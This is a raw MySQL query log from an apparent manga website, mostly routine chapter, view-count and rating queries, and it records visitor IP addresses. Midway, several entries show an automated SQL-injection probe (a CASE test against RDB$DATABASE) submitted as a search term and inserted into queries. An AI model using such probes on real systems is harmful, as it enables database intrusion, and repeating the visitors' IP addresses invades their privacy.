LIMIT 1 330644516 Quit 330644517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644517 Quit 330644518 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644518 Quit 330644519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644519 Quit 330644520 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15216' 330644520 Quit 330644521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644521 Query select * FROM chapters where id = '15216' 330644521 Quit 330644522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644522 Query select * FROM chapters where manga_id = '301' order by id desc 330644522 Quit 330644523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644523 Query Update chapters set view=view+1 where id = '15216' 330644523 Quit 330644524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644524 Query select * FROM chapters where id = '15216' 330644524 Quit 330644525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644525 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15216' 330644525 Quit 330644526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644526 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('301', '15216', '2607:fb90:7955:c575:ad3:df51:cbc5:83d7', 'mangacherri.com', '2026-02-26 03:28:33', '2026-02-26 03:28:33') 330644526 Quit 330644527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644527 Query select * FROM chapter_images where chapter_id = '15216' 330644527 Quit 330644528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644528 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '301' and m.active = 1 330644528 Quit 330644529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644529 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='301' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:28:34 330644529 Quit 330644530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644530 Quit 330644531 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644531 Quit 330644532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644532 Quit 330644533 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644533 Quit 330644534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644534 Quit 330644535 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644535 Quit 330644536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644537 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644536 Quit 330644537 Quit 260225 19:28:35 330644538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644539 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6601' 330644538 Quit 330644539 Quit 330644540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644540 Query select * FROM chapters where id = '6601' 330644540 Quit 330644541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644541 Query select * FROM chapters where manga_id = '127' order by id desc 330644541 Quit 330644542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644542 Query Update chapters set view=view+1 where id = '6601' 330644542 Quit 330644543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644543 Query select * FROM chapters where id = '6601' 330644544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644544 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6601' 330644543 Quit 330644545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644544 Quit 330644545 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '6601', '5.45.134.144', 'mangacherri.com', '2026-02-26 03:28:35', '2026-02-26 03:28:35') 330644545 Quit 330644546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644546 Query select * FROM chapter_images where chapter_id = '6601' 330644546 Quit 330644547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644547 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330644547 Quit 330644548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644548 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330644549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644549 Quit 330644550 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1)AND//7235((SELECT//CASE//7235//WHEN//7235//THEN//1//ELSE//0//END//FROM//RDBDATABASE))-- -', '169.150.196.30', '2026-02-26 03:28:35') 330644550 Quit 330644551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644551 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1)AND//7235((SELECT//CASE//7235//WHEN//7235//THEN//1//ELSE//0//END//FROM//RDBDATABASE))-- -%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1)AND//7235((SELECT//CASE//7235//WHEN//7235//THEN//1//ELSE//0//END//FROM//RDBDATABASE))-- -%' ) ) 330644551 Quit 330644552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644552 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\')AND/**/7235=(\'~\'||(SELECT/**/CASE/**/7235/**/WHEN/**/7235/**/THEN/**/1/**/ELSE/**/0/**/END/**/FROM/**/RDB$DATABASE)||\'~\')-- -' 330644552 Quit 330644553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644553 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330644553 Quit 330644554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644554 Quit 330644555 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644555 Quit 330644556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330644556 Quit 330644557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330644557 Quit 330644558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330644558 Quit 330644559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330644559 Quit 330644560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330644560 Quit 330644561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330644561 Quit 330644562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330644562 Quit 330644563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330644563 Quit 330644564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330644564 Quit 330644565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330644565 Quit 330644566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330644566 Quit 330644567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330644567 Quit 330644568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330644568 Quit 330644569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330644569 Quit 330644570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330644570 Quit 330644571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330644571 Quit 330644572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330644572 Quit 330644573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330644573 Quit 330644574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330644574 Quit 330644575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330644575 Quit 330644576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330644576 Quit 330644577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330644577 Quit 330644578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330644578 Quit 330644579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330644579 Quit 330644580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330644580 Quit 330644581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330644581 Quit 330644582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330644582 Quit 330644583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330644583 Quit 330644584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330644584 Quit 330644585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330644585 Quit 330644586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330644586 Quit 330644587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330644587 Quit 330644588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330644588 Quit 330644589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330644589 Quit 330644590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330644590 Quit 330644591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330644591 Quit 330644592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330644592 Quit 330644593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330644593 Quit 330644594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330644594 Quit 330644595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330644595 Quit 330644596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330644596 Quit 330644597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330644597 Quit 330644598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330644598 Quit 330644599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330644599 Quit 330644600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330644600 Quit 330644601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330644601 Quit 330644602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330644602 Quit 330644603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330644603 Quit 330644604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330644604 Quit 330644605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330644605 Quit 330644606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330644606 Quit 330644607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330644607 Quit 330644608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330644608 Quit 330644609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330644609 Quit 330644610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330644610 Quit 330644611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330644611 Quit 330644612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330644612 Quit 330644613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330644613 Quit 330644614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330644614 Quit 330644615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330644615 Quit 330644616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330644616 Quit 330644617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330644617 Quit 330644618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330644618 Quit 330644619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330644619 Quit 330644620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330644620 Quit 330644621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330644621 Quit 330644622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330644622 Quit 330644623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330644623 Quit 330644624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330644624 Quit 330644625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330644625 Quit 330644626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330644626 Quit 330644627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330644627 Quit 330644628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330644628 Quit 330644629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330644630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330644630 Quit 330644629 Quit 330644631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330644631 Quit 330644632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330644632 Quit 330644633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330644633 Quit 330644634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330644634 Quit 330644635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330644635 Quit 330644636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330644636 Quit 330644637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330644637 Quit 330644638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330644638 Quit 330644639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330644639 Quit 330644640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330644640 Quit 330644641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330644641 Quit 330644642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330644642 Quit 330644643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330644643 Quit 330644644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330644644 Quit 330644645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330644645 Quit 330644646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330644646 Quit 330644647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330644647 Quit 330644648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330644648 Quit 330644649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330644649 Quit 330644650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330644650 Quit 330644651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330644651 Quit 330644652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330644652 Quit 330644653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330644653 Quit 330644654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330644654 Quit 330644655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330644655 Quit 330644656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330644656 Quit 330644657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330644657 Quit 330644658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330644658 Quit 330644659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330644659 Quit 330644660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330644660 Quit 330644661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330644661 Quit 330644662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330644662 Quit 330644663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330644663 Quit 330644664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330644664 Quit 330644665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330644665 Quit 330644666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644666 Query select count(id) as total_rating, (sum(rating) / count(id)) 